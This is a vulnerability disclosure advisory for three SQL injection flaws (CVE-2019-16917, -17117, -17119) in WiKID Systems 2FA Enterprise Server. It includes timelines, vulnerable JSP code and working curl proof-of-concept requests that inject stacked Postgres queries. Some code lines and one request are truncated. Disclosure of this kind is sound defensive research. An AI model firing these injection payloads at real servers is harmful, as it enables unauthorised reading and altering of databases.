WiKID Systems 2FA Enterprise Server SQL injection

A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047.

Penetration Testing
Security Research
WiKID Systems 2FA Enterprise Server SQL injection


A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047. The uid and domain parameters, used by searchDevices.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete information in the database.



  • 14 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032 and disclosed to WiKID Systems.
  • 26 Sep 2019 - Issue confirmed by WiKID Systems, Patch Released
  • 16 Oct 2019 - Public Disclosure


The source code for searchDevices.jsp reveals the buildSearchWhereClause. The uid and domain parameters are retrieved in the buildSearchWhereClause function:

191  private void buildSearchWhereClause(HttpServletRequest request) {
192  where = "";
193 String uid=
194 String domain=request.getParameter("domain");

domain parameter

If the domain parameter is set and uid parameter is not set, domain is included, in the query allowing SQL injection here:

203  }else if(!domain.equals("0") && uid==null){
204  where="where domainid="+

If the uid parameter is set, the domain parameter is included, in the query allowing SQL injection here:

205  }else if(uid!=null){
214  if(!domain.equals("0")){
215  where=where+" and domainid="+
216  }
217  }
218  }

The backend database is Postgres which supports Stacked Queries. A value such as 1; select pg_sleep(10);-- will cause the database and application will hang for 10+ seconds, the original query will execute followed a second query to sleep for 10 seconds:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp

uid parameter

If the uid parameter is set, the logic drops down to following block where the uid parameter is included in the query:

205  }else if(uid!=null){
206  uid=uid.toLowerCase().trim();
207  String ask=uid.substring(uid.length()-1);
208  if(ask!=null ){
209 // uid=uid.substring(0,uid.length()-1);
210  where="where RTRIM(LOWER(userid)) like LOWER('%"+
211 // }else{
212 // where="where RTRIM(LOWER(userid))=LOWER('"+uid+"')";
213  }

A request, such as the following, will trigger the issue, causing the application to delay for 10+ seconds:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp


A SQL Injection vulnerability, CVE-2019-17117, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The key parameter, used in processPref.jsp, is not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.



  • 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
  • 29 Sep 2019 - Issue disclosed to WiKID Systems
  • 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
  • 16 Oct 2019 - Public Disclosure


The source code for processPref.jsp reveals the following code block:

121  } else if (request.getParameter("action").equals("Update")) {
122  // need to do error checking here.
123  sql = "SELECT key FROM parms1to1 where key='" +
request.getParameter("key") + "'";
124  ResultSet result = stat.executeQuery(sql);
125  if (! {
126  %>

If the action parameter is set to Update, the key parameter is included in a SQL query used to retrieve the Parameter that will be updated. The key parameter is not sanitized before it is included in the query. A request such as:


Will cause the application to delay for at least 5 seconds.


Multiple SQL Injection vulnerabilities, CVE-2019-17119, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The substring and source parameters, used by Logs.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.



  • 26 Sep 2019 - Issue discovered on WiKID Systems 2FA Enterprise Server 4.2.0-b2032
  • 29 Sep 2019 - Issue disclosed to WiKID Systems
  • 09 Oct 2019 - Issue confirmed by WiKID Systems, Patch released
  • 16 Oct 2019 - Public Disclosure


The source code for Logs.jsp reveals the following logic:

192  private String createSourceFilter(HttpServletRequest request) {
String source = getLogConfig(request).get("source");
194  if (source == null || "None".equals(source)) {
195  return " ";
196  }
197  return " and logger_name = '" +
source + "' ";
198  }
200  private String createSubStringFilter(HttpServletRequest request) {
String subString = getLogConfig(request).get("subString");
202  if (subString == null || subString.trim().length() == 0) {
203  return " ";
204  }
205  return " and rendered_message like '%" +
subString + "%' ";
206  }

createSourceFilter reads the source parameter and includes the value in a query being constructed;createSubStringFilter reads the substring parameter and includes the value in a query that is being constructed.

The following queries can be used to demonstrate the parameters are vulnerable, the queries take advantage of Stacked Queries in Postgres; a secondary request is issued that causes the database and application to delay for 5+ seconds:

time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp

real 0m10.572s
user 0m0.008s
sys  0m0.016stime curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "subString=
'; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp

real 0m10.572s
user 0m0.008s
sys  0m0.016s

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